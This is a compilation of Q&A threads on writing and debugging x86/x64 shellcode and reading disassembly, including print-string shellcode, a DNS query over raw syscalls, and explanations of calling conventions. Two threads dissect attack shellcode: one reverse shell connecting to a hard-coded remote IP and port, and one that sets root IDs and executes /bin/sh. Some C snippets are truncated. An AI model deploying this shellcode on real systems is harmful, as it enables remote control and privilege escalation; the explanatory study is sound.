Shell code print character(64bits) - shellcode

I have a problem with this shell code.
When I run the assembler code it prints the caracter, but when I call it as a function from c it does not.
I used gdb to test all the instruction executed and it seems to execute all the instructions.
It is very weird because I debugged both asm and c versions and they do the same but in the int 0x80 it prints nothing for the C code.
This is the C code:
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
0000000000000000 <main>: /
0: 48 31 c9 xor %rcx,%rcx /
3: 48 31 c0 xor %rax,%rax /
6: eb 13 jmp 1b <n> /
0000000000000008 <et>: /
8: 59 pop %rcx /
9: 48 31 c0 xor %rax,%rax /
c: 48 31 db xor %rbx,%rbx /
f: 48 31 d2 xor %rdx,%rdx /
12: b0 04 mov $0x4,%al /
14: b3 01 mov $0x1,%bl /
16: b2 01 mov $0x1,%dl /
18: cd 80 int $0x80 /
1a: c3 retq /
000000000000001b <n>: /
1b: e8 e8 ff ff ff callq 8 <et> /
0000000000000020 <abc>: /
20: 77 .byte 0x77 /
... /
char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x13\x59\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x04\xb3\x01\xb2\x01\xcd\x80\xc3\xe8\xe8\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x11\x59\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x48\x31\xc0\x48\xff\xc0\xcd\x80\xe8\xea\xff\xff\xffw";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode),
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
return 0;
This is the nasm code:
global main
main: ; main
xor rcx, rcx ; eficient way turning register to 0
xor rax, rax ; exclusive or
jmp n
pop rcx
xor rax, rax
xor rbx, rbx
xor rdx, rdx
mov al, 4 ; Number of system call (write)
mov bl, 1 ; argument(1=stdout)
mov dl, 1 ; number of characters
int 0x80
call et
abc: db 'w'
I have solved the problem.
In this webpage: I found that in 64 bits the systemcalls must be called using syscall insted of int 0x80 and the registers of the arguments are different.
Then I found this other web page: It have some examples about doing these systemcalls, think it is a good webpage.
But the question now is, why did it work with the Nasm code? Is it something about compatibility? May be the assembler code was running in compatibility mode because the assembler detected the int 0x80 instruction and in C the compiler couldn't because it cannot interpret the shellcode?
I leave here the working C code:
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
0000000000000000 <main>: /
0: 48 31 c9 xor %rcx,%rcx /
3: 48 31 c0 xor %rax,%rax /
6: eb 16 jmp 1e <n> /
0000000000000008 <et>: /
8: 5e pop %rsi /
9: 48 31 c0 xor %rax,%rax /
c: 48 31 db xor %rbx,%rbx /
f: 48 31 d2 xor %rdx,%rdx /
12: b0 01 mov $0x1,%al /
14: b3 01 mov $0x1,%bl /
16: 48 89 df mov %rbx,%rdi /
19: b2 01 mov $0x1,%dl /
1b: 0f 05 syscall /
1d: c3 retq /
000000000000001e <n>: /
1e: e8 e5 ff ff ff callq 8 <et> /
0000000000000023 <abc>: /
23: 77 .byte 0x77 /
char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x16\x5e\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x01\xb3\x01\x48\x89\xdf\xb2\x01\x0f\x05\xc3\xe8\xe5\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x13\x59\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x04\xb3\x01\xb2\x01\xcd\x80\xc3\xe8\xe8\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x11\x59\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x48\x31\xc0\x48\xff\xc0\xcd\x80\xe8\xea\xff\xff\xffw";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode),
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
return 0;

You were probably building the ELF file as a 32 bit one. Even if your OS is 64 bits, if the binary is 32 then it runs in compatibility mode.
Same thing happens on Windows (it's called "Windows-on-Windows-64" or "WOW64").


NASM Segmentation fault

I'm using a 64-bit Ubuntu 18.04.3 LTS VM and I'm trying to write a simple x64 assembly code that will print "Owned!!!".
Because I don't want any 0x00 or 0x0a bytes and I want the code to be position independent (because I'm learning how to write shellcodes), I wrote it this way:
;hello4.asm attempts to make the code position independent
section .text
global _start
;clear out the registers we are going to need
xor rax, rax
xor rbx, rbx
xor rcx, rcx
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rcx, rsp
mov dl, 8
int 0x80
;exit(int ret)
mov al,1
xor rbx, rbx
int 0x80
This is the output that I'm getting:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ nasm -f elf64 hello4.asm
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ld hello4.o -o hello4
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 db xor rbx,rbx
400086: 48 31 c9 xor rcx,rcx
400089: 48 31 d2 xor rdx,rdx
40008c: b0 04 mov al,0x4
40008e: b3 01 mov bl,0x1
400090: 68 64 21 21 21 push 0x21212164
400095: 68 4f 77 6e 65 push 0x656e774f
40009a: 48 89 e1 mov rcx,rsp
40009d: b2 08 mov dl,0x8
40009f: cd 80 int 0x80
4000a1: b0 01 mov al,0x1
4000a3: 48 31 db xor rbx,rbx
4000a6: cd 80 int 0x80
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ./hello4
Segmentation fault (core dumped)
How do I fix this?
I've understood that int 0x80 is intended for 32-bit programs and I should use syscall instead and that syscall has different ids for each system call.
The new code is:
;hello4.asm attempts to make the code position independent
section .text
global _start
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 8
;exit(int ret)
mov al, 60
xor rdi, rdi
The output is Owne% instead of Owned!!! now.
It still needs to be fixed.
With the help of #CertainLach I've written the correct code:
;hello4.asm attempts to make the code position independent
section .text
global _start
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
mov rsi, 0x21212164656e774f
push rsi
mov rsi, rsp
mov dl, 8
;exit(int ret)
mov al, 60
xor rdi, rdi
This code contains no null bytes or 0x0a bytes and it's position-independent, as following:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 48 be 4f 77 6e 65 64 movabs rsi,0x21212164656e774f
400099: 21 21 21
40009c: 56 push rsi
40009d: 48 89 e6 mov rsi,rsp
4000a0: b2 08 mov dl,0x8
4000a2: 0f 05 syscall
4000a4: b0 3c mov al,0x3c
4000a6: 48 31 ff xor rdi,rdi
4000a9: 0f 05 syscall
This is also a correct way of implementing the solution, which is 1 bytecode less, but with more memory consumption:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ cat hello4.asm
;hello4.asm attempts to make the code position independent
section .text
global _start
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 16
;exit(int ret)
mov al, 60
xor rdi, rdi
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 68 64 21 21 21 push 0x21212164
400097: 68 4f 77 6e 65 push 0x656e774f
40009c: 48 89 e6 mov rsi,rsp
40009f: b2 10 mov dl,0x10
4000a1: 0f 05 syscall
4000a3: b0 3c mov al,0x3c
4000a5: 48 31 ff xor rdi,rdi
4000a8: 0f 05 syscall
Thank you so much!
Can't answer your comment, you can't just change int 0x80 to syscall to make it work, system call numbers differ, i.e sys_write you have here, have id 4 for int 0x80, and id 1 with syscall
Here you can see numbers for syscall
And here for int 0x80

Saving DNS response in assembly using syscalls

So I am wanting to learn more about DNS and I am wanting to use assembly to accomplish the task.
I noticed in tcpdump that my request appears to be accurate and I receive a response back, but my code doesn't know how to handle this.
I looked on a few sites and it looks like a recvfrom should be used , but I don't understand how I would call that function. Another answer I see is to use DUP2 and from what I understand it redirects stdin,out and err . From what I have been reading , I should manipulate sockcall ( 0x66 ) to call the recvfrom and get the data that has been sent to me. Most of the examples are using TCP and don't quite fit here since I am using UDP for the DNS.
Here is my code which queries google for
; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1
push 0x66
pop eax
push 0x1
pop ebx
xor ecx,ecx
push ecx
; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument
push 0x2
push 0x2
mov ecx,esp
int 0x80
; saving fd
push 0x08080808 ; ; I love that this doesn't really need to be backwards.
;push 0x0100007F ; 0100007F for testing...
xor edx,edx
mov dh, 0x35 ; port 53; comment this for variable port
push dx ; comment this for variable port
; push word PORT ; UNcomment this for variable port
push word 0x2 ;
mov ecx,esp ; save pointer to ecx
push 0x10 ; addrlen
push ecx ; pointer to sockaddr
push eax ; fd received previously
mov ecx,esp ;
mov esi,eax ; save fd for next call
xor eax,eax
mov al,0x66
add bl,0x2
int 0x80
; now we send a UDP packet to open stateful firewall :]
xor eax,eax
mov al,0x66 ; ssize_t send(int sockfd, const void *buf, size_t len, int flags);
push 0x00000001
push 0x00010000
push 0x6d6f6303
push 0x656c706d
push 0x61786507
push 0x00000000
push 0x00000100
push 0x0001AAAA
mov edx,esp ; Move the string to EDX so we can send it.
xor ecx,ecx
push ecx
push 64 ; size of message to be sent is 8
push edx
push esi
mov ecx,esp
xor ebx,ebx
mov bl,0x9
int 0x80
mov ebx,esi
xor ecx,ecx
mov cl,0x2
loop: ;Not sure if this is needed at all
; syscall dup2
mov al,0x3f
int 0x80
dec ecx
jns loop
xor esi,esi
push esi
mov edx,esp
push ebx
mov ecx,esp
int 0x80
Here is how it's done .
;Author : Krash
section .text
global main ;must be declared for linker (ld)
; SOCKETCALL PARAMS You can pass a value to EBX to utilize one of these functions.
; #define SYS_SOCKET 1 /* sys_socket(2) */
; #define SYS_BIND 2 /* sys_bind(2) */
; #define SYS_CONNECT 3 /* sys_connect(2) */
; #define SYS_LISTEN 4 /* sys_listen(2) */
; #define SYS_ACCEPT 5 /* sys_accept(2) */
; #define SYS_GETSOCKNAME 6 /* sys_getsockname(2) */
; #define SYS_GETPEERNAME 7 /* sys_getpeername(2) */
; #define SYS_SOCKETPAIR 8 /* sys_socketpair(2) */
; #define SYS_SEND 9 /* sys_send(2) */
; #define SYS_RECV 10 /* sys_recv(2) */
; #define SYS_SENDTO 11 /* sys_sendto(2) */
; #define SYS_RECVFROM 12 /* sys_recvfrom(2) */
; #define SYS_SHUTDOWN 13 /* sys_shutdown(2) */
; #define SYS_SETSOCKOPT 14 /* sys_setsockopt(2) */
; #define SYS_GETSOCKOPT 15 /* sys_getsockopt(2) */
; #define SYS_SENDMSG 16 /* sys_sendmsg(2) */
; #define SYS_RECVMSG 17 /* sys_recvmsg(2) */
; #define SYS_ACCEPT4 18 /* sys_accept4(2) */
; #define SYS_RECVMMSG 19 /* sys_recvmmsg(2) */
; #define SYS_SENDMMSG 20 /* sys_sendmmsg(2) */
;The Message We want to send.
; AA AA - ID
; 01 00 - Query parameters
; 00 01 - Number of questions
; 00 00 - Number of answers
; 00 00 - Number of authority records
; 00 00 - Number of additional records
; 07 - 'example' has length 7, ;so change this to be the length of domain ; keep in mind there are not '.' in the question.
; 65 - e
; 78 - x
; 61 - a
; 6D - m
; 70 - p
; 6C - l
; 65 - e
; 03 - subdomain '.com' length 03 ; change this to be the length of type.
; 63 - c
; 6F - o
; 6D - m
; 00 - zero byte to end the QNAME
; 00 01 - QTYPE
; 00 01 - QCLASS
; DNS ANSWER! This is What We Want to receive ;
; aa aa
; 81 80
; 00 01
; 00 01
; 00 00
; 00 00
; 07 65
; 78 61
; 6d 70
; 6c 65
; 03 63
; 6f 6d
; 00 00
; 01 00
; 01 c0
; 0c 00
; 01 00
; 01 00
; 00 12
; 8d 00
; 04
; 5d
; b8
; d8
; 22
; we create a socket fd, using again syscall 0x66 and argument SYS_SOCKET so ebx = 1
push 0x66
pop eax
push 0x1
pop ebx
xor ecx,ecx
push ecx
; but this times it will be a SOCK_DGRAM UDP, so 0x2 as argument
push 0x2
push 0x2
mov ecx,esp
int 0x80 ; SYS_SOCKET
; saving fd on the stack ; In reality I think I will save the port here instead
push eax
push 0x08080808 ; ; I love that this doesn't really need to be backwards.
;push 0x0100007F ; 0100007F for testing...
xor edx,edx
mov dh, 0x35 ; port 53; comment this for variable port
push dx ; comment this for variable port
; push word PORT ; UNcomment this for variable port
push word 0x2 ;
mov ecx,esp ; save pointer to ecx
push 0x10 ; addrlen
push ecx ; pointer to sockaddr
push eax ; fd received previously
mov ecx,esp ;
mov esi,eax ; save fd for next call
xor eax,eax
mov al,0x66
add bl,0x2 ; BL = 3 SYS_CONNECT
; now we send a UDP packet to open stateful firewall :]
xor eax,eax
mov al,0x66
push 0x00000001 ; Origional Working request to google dns for
push 0x00010000
push 0x6d6f6303
push 0x656c706d
push 0x61786507
push 0x00000000
push 0x00000100
push 0x0001AAAA ; This is the DNS HEADER above in little endian order.
mov edx,esp ; Move the string to EDX so we can send it.
xor ecx,ecx
push ecx
push 64 ; size of message to be sent is 8
push edx
push esi
mov ecx,esp
xor ebx,ebx
mov bl,0x9
int 0x80 ;CALL SYS_SEND
mov eax, 3 ; Prepare for SYSCALL_READ
mov ebx, 3 ;
mov ecx, esp
mov edx, 100
add esp, eax
sub esp, 4
mov eax ,[esp]
push eax ; Probably not needed, I just want to ensure it's saved on the stack for further use..

x86 64 Reverse shell shellcode

I am looking a reverse shell shellcode from this link. I am not able to follow the reason for the following instructions in the shellcode:
4000a3: 4d 31 d2 xor r10,r10
4000a6: 41 52 push r10
4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a
4000ba: 04
4000bb: 48 89 e6 mov rsi,rsp
I searched other SO questions, and I find that BYTE/WORD/DWORD PTR would be used to assign a byte/word/dword. Since this x86 64, I'm assuming WORD here means 2 bytes and DWORD means 4 bytes (please correct me if I'm wrong).
The author is pushing zero on the stack. Then he has 3 mov instructions.
Assume RSP initially points to:
x00 x00 x00 x00 x00 x00 x00 x00
1) Is the following the effect of the three mov instructions (assuming little endian) ?
x04 x35 x33 x0a x7a x69 x00 x02
2) If yes, then what is the author achieving by it because isn't the next mov instructions overwriting what's pointed by rsp ?
1) Yes
2) Author is saving the sockaddr for the socket connect syscall
int connect(int sockfd, const struct sockaddr *addr,
socklen_t addrlen);
In x86-64, the arguments are the registers rdi, rsi and rdx. So, He is moving the pointer addr pointer to rsi register.
mov BYTE PTR [rsp],0x2 ; Family Address (PF_INET)
mov WORD PTR [rsp+0x2],0x697a ; port = 27002
mov DWORD PTR [rsp+0x4],0x435330a ; addr = (0a333504)

Assembly - Passing parameters to a function call

I am currently practicing with assembly reading by disassemblying C programs and trying to understand what they do.
I am stuck with a trivial one: a simple hello world program.
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("Hello, world!");
When I disassemble the main:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400526 <+0>: push rbp
0x0000000000400527 <+1>: mov rbp,rsp
0x000000000040052a <+4>: mov edi,0x4005c4
0x000000000040052f <+9>: mov eax,0x0
0x0000000000400534 <+14>: call 0x400400 <printf#plt>
0x0000000000400539 <+19>: mov eax,0x0
0x000000000040053e <+24>: pop rbp
0x000000000040053f <+25>: ret
I understand the first two lines: the base pointer is saved on the stack (by push rbp, which causes the value of the stack pointer to be decreased by 8, because it has "grown") and the value of the stack pointer is saved in the base pointer (so that parameters and local variable can be easily reached through positive and negative offsets, respectively, while the stack can keep "growing").
The third line presents the first issue: why is 0x4005c4 (the address of the "Hello, World!" string) moved in the edi register instead of moving it on the stack? Shouldn't the printf function take the address of that string as parameter? For what I know, functions take parameters from the stack (but here, it looks like the parameter is put in that register: edi)
On another post here on StackOverflow I read that "printf#ptl" is like a stub function that calls the real printf function. I tried to disassemble that function, but it gets even more confusing:
(gdb) disassemble printf
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8
0x00007ffff7a637b7 <+7>: test al,al
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91>
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0]
0x00007ffff7a63813 <+99>: mov rsi,rdi
0x00007ffff7a63816 <+102>: lea rdx,[rsp+0x8]
0x00007ffff7a6381b <+107>: mov QWORD PTR [rsp+0x10],rax
0x00007ffff7a63820 <+112>: lea rax,[rsp+0x20]
0x00007ffff7a63825 <+117>: mov DWORD PTR [rsp+0x8],0x8
0x00007ffff7a6382d <+125>: mov DWORD PTR [rsp+0xc],0x30
0x00007ffff7a63835 <+133>: mov QWORD PTR [rsp+0x18],rax
0x00007ffff7a6383a <+138>: mov rax,QWORD PTR [rip+0x36d70f] # 0x7ffff7dd0f50
0x00007ffff7a63841 <+145>: mov rdi,QWORD PTR [rax]
0x00007ffff7a63844 <+148>: call 0x7ffff7a5b130 <_IO_vfprintf_internal>
0x00007ffff7a63849 <+153>: add rsp,0xd8
0x00007ffff7a63850 <+160>: ret
End of assembler dump.
The two mov operations on eax (mov eax, 0x0) bother me a little as well, since I don't get they role in here (but I am more concerned with what I have just described).
Thank you in advance.
gcc is targeting the x86-64 System V ABI, used by all x86-64 systems other than Windows (for various historical reasons). Its calling convention passes the first few args in registers before falling back to the stack. (See also the Wikipedia basic summary of this calling convention.)
And yes, this is different from the crusty old 32-bit calling conventions that use the stack for everything. This is a Good Thing. See also the x86 tag wiki for more links to ABI docs, and tons of other stuff.
0x0000000000400526: push rbp
0x0000000000400527: mov rbp,rsp # stack-frame boilerplate
0x000000000040052a: mov edi,0x4005c4 # first arg
0x000000000040052f: mov eax,0x0 # 0 FP args in vector registers
0x0000000000400534: call 0x400400 <printf#plt>
0x0000000000400539: mov eax,0x0 # return 0. If you'd compiled with optimization, this and the previous mov would be xor eax,eax
0x000000000040053e: pop rbp # clean up stack frame
0x000000000040053f: ret
Pointers to static data fit into 32 bits, which is why it can use mov edi, imm32 instead of movabs rdi, imm64.
Floating-point args are passed in SSE registers (xmm0-xmm7), even to var-args functions. al indicates how many FP args are in vector registers. (Note that C's type promotion rules mean that float args to variadic functions are always promoted to double, which is why printf doesn't have any format specifiers for float, only double and long double).
printf#ptl is like a stub function that calls the real printf function.
Yes, that's right. The Procedure Linking Table entry starts out as a jmp to a dynamic linker routine that resolves the symbol and modifies the code in the PLT to turn it into a jmp directly to the address where libc's printf definition is mapped. printf is a weak alias for __printf, which is why gdb chooses the __printf label for that address, after you asked for disassembly of printf.
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8 # reserve space
0x00007ffff7a637b7 <+7>: test al,al # check if there were any FP args
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi # store the integer arg-passing registers to local scratch space
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91> # skip storing the FP arg-passing regs if there were no FP args
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0] # some more stuff
So printf's implementation keeps the var-args handling simple by storing all the arg-passing registers (except the first one holding the format string) in order to local arrays. It can walk a pointer through them instead of needing switch-like code to extract the right integer or FP arg. It still needs to keep track of the first 5 integer and first 8 FP args, because they aren't contiguous with the rest of the args pushed by the caller onto the stack.
The Windows 64-bit calling convention's shadow space simplifies this by providing space for a function to dump its register args to the stack contiguous with the args already on the stack, but that's not worth wasting 32 bytes of stack on every call, IMO. (See my answer and comments on other answers on Why does Windows64 use a different calling convention from all other OSes on x86-64?)
there is nothing trivial about printf, not the first choice for what you are trying to do but, turned out to be not overly complicated.
Something simpler:
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: e8 00 00 00 00 callq 9 <fun+0x9>
9: 48 83 c4 08 add $0x8,%rsp
d: 83 c0 07 add $0x7,%eax
10: c3 retq
and the stack is used. eax used for the return.
now use a pointer
extern unsigned int more_fun ( unsigned int * );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
d: e8 00 00 00 00 callq 12 <fun+0x12>
12: 48 83 c4 18 add $0x18,%rsp
16: 83 c0 07 add $0x7,%eax
19: c3 retq
and there you go edi used as in your case.
two pointers
extern unsigned int more_fun ( unsigned int *, unsigned int * );
unsigned int fun ( unsigned int x, unsigned int y )
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 89 74 24 08 mov %esi,0x8(%rsp)
c: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
11: 48 8d 74 24 08 lea 0x8(%rsp),%rsi
16: e8 00 00 00 00 callq 1b <fun+0x1b>
1b: 48 83 c4 18 add $0x18,%rsp
1f: 83 c0 07 add $0x7,%eax
22: c3 retq
now edi and esi are used. all looking like it is the calling convention to me...
a string
extern unsigned int more_fun ( const char * );
unsigned int fun ( void )
return(more_fun("Hello World")+7);
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <fun+0xe>
e: 48 83 c4 08 add $0x8,%rsp
12: 83 c0 07 add $0x7,%eax
15: c3 retq
eax is not prepped as in printf, so perhaps eax has something to do with the number of parameters that follow, try putting more parameters on your printf and see if eax going in changes.
if I add -m32 on my command line then edi is not used.
00000000 <fun>:
0: 83 ec 18 sub $0x18,%esp
3: 68 00 00 00 00 push $0x0
8: e8 fc ff ff ff call 9 <fun+0x9>
d: 83 c4 1c add $0x1c,%esp
10: 83 c0 07 add $0x7,%eax
13: c3
I suspect the push is a placeholder for the linker to push the address to the string when the linker patches up the binary, this was just an object. So my guess is when you have a 64 bit pointer, the first one or two go into registers then the stack is used after it runs out of registers.
Obviously the compiler works so this is conforming to the compilers calling convention.
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: 83 c7 05 add $0x5,%edi
7: e8 00 00 00 00 callq c <fun+0xc>
c: 48 83 c4 08 add $0x8,%rsp
10: 83 c0 07 add $0x7,%eax
13: c3 retq
correction based on Peter's comment. Yeah it does appear that registers are being used here.
And since he mentioned 6 parameters, lets try 7.
extern unsigned int more_fun
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int
unsigned int fun (
unsigned int a,
unsigned int b,
unsigned int c,
unsigned int d,
unsigned int e,
unsigned int f,
unsigned int g
0000000000000000 <fun>:
0: 48 83 ec 10 sub $0x10,%rsp
4: 83 c1 04 add $0x4,%ecx
7: 83 c2 03 add $0x3,%edx
a: 8b 44 24 18 mov 0x18(%rsp),%eax
e: 83 c6 02 add $0x2,%esi
11: 83 c7 01 add $0x1,%edi
14: 41 83 c1 06 add $0x6,%r9d
18: 41 83 c0 05 add $0x5,%r8d
1c: 83 c0 07 add $0x7,%eax
1f: 50 push %rax
20: e8 00 00 00 00 callq 25 <fun+0x25>
25: 48 83 c4 18 add $0x18,%rsp
29: 83 c0 11 add $0x11,%eax
2c: c3 retq
and sure enough that 7th parameter was pulled from the stack modified and put back on the stack before the call. The other 6 in registers.

How can I check the commands the given shellcode executes?

Lets say I'm given the following shellcode:
char shellcode[]=
How can I check what it means / the ASM instructions it represents?
Thanks :)
Compile and disassemble it! For your example:
$ cat example.c
char shellcode[]=
$ make example.o
cc -c -o example.o example.c
$ objdump -D example.o
example.o: file format elf64-x86-64
Disassembly of section .data:
0000000000000000 <shellcode>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 99 cltd
7: b0 a4 mov $0xa4,%al
9: cd 80 int $0x80
b: 6a 0b pushq $0xb
d: 58 pop %rax
e: 51 push %rcx
f: 68 2f 2f 73 68 pushq $0x68732f2f
14: 68 2f 62 69 6e pushq $0x6e69622f
19: 89 e3 mov %esp,%ebx
1b: 51 push %rcx
1c: 89 e2 mov %esp,%edx
1e: 53 push %rbx
1f: 89 e1 mov %esp,%ecx
21: cd 80 int $0x80
Note the use of objdump's -D flag to disassemble all sections, rather than just what it thinks the executable sections are.
As for what this code means, I guess we can break it down piece by piece (from above, with inline comments):
xor %eax,%eax // clear eax register
xor %ebx,%ebx // clear ebx register
xor %ecx,%ecx // clear ecx register
cltd // clear edx register (via sign-extension of eax
// - only a compiler would do this operation
// in this way, I'd guess, so your shell code
// probably wasn't hand-written
mov $0xa4,%al // put 0xa4 (decimal 164) into eax
int $0x80 // do system call. Syscall 164 is "sys_setresuid"
// - it takes three parameters, in ebx, ecx, and edx,
// so in this case, it's calling sys_setresuid(0, 0, 0);
pushq $0xb // push constant 0xb (decimal 11) to the stack
pop %rax // pop it back into rax
push %rcx // push the 0 in rcx to the stack
pushq $0x68732f2f // push constant to the stack (looks like ASCII? "//sh")
pushq $0x6e69622f // push constant to the stack (looks like ASCII? "/bin")
mov %esp,%ebx // put a pointer to this stack pushed stuff into ebx
push %rcx // push rcx again, it's still 0
mov %esp,%edx // put a pointer to this 0 on the stack into edx
push %rbx // push rbx, it's 0 too
mov %esp,%ecx // put a pointer to this 0 into ecx
int $0x80 // system call again - this time, it's call 11, which is
// sys_execve. It takes a pointer to a filename to execute
// and two more pointers to the arguments and environment to
// pass
So this code first calls:
sys_setresuid(0, 0, 0)
To give itself root privileges, and then calls sys_execve() to start running /bin/sh, giving a shell prompt.
